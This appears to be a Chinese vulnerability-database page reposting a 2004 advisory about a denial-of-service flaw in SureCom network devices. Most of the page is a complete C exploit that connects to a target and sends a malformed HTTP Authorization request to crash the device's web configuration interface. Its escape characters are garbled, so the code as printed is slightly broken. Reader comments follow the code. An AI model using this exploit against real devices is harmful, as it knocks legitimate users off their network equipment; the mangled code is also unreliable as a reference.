SureCom EP-9510AX/EP-4504AX Network Device – Malformed Web Authorisation Request Denial of Service (2)
漏洞ID | 1054401 | 漏洞类型 | |
发布时间 | 2004-03-02 | 更新时间 | 2004-03-02 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Hardware | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9795/info
An issue in the handling of specific web requests by SureCom network devices has been identified. By placing a malformed request to the web configuration interface, it is possible for an attacker to deny service to legitimate users of a vulnerable device.
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
int main(int argc, char *argv[]) {
if(argc < 3) {
printf("SureCom Network Device
DoS,n");
printf("by shaun2k2 -
[email protected]");
printf("Usage: %s <host> <port>n",
argv[0]);
exit(-1);
}
int sock;
struct hostent *he;
struct sockaddr_in dest;
if((he = gethostbyname(argv[1])) == NULL) {
herror("gethostbyname()");
exit(-1);
}
printf("SureCom Network Device DoS,n");
printf("by shaun2k2 -
[email protected]");
printf("[+] Crafting exploit buffer...nn");
char explbuf[] = "GET /
HTTP/1.1rnAuthorization: B 00000000rnrn";
if((sock = socket(AF_INET, SOCK_STREAM, 0)) <
0) {
perror("socket()");
exit(-1);
}
dest.sin_family = AF_INET;
dest.sin_port = htons(atoi(argv[2]));
dest.sin_addr = *((struct in_addr
*)he->h_addr);
printf("[+] Connecting...n");
if(connect(sock, (struct sockaddr *)&dest,
sizeof(struct sockaddr)) < 0) {
perror("socket()");
exit(-1);
}
printf("[+] Connected!nn");
printf("[+] Sending malicious HTTP
request...n");
send(sock, explbuf, strlen(explbuf), 0);
sleep(2);
close(sock);
printf("[+] Done!n");
return(0);
}
相关推荐: Internet Junkbuster Proxy Unauthorized Connections Vulnerability
Internet Junkbuster Proxy Unauthorized Connections Vulnerability 漏洞ID 1101161 漏洞类型 Configuration Error 发布时间 2002-12-23 更新时间 2002-1…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666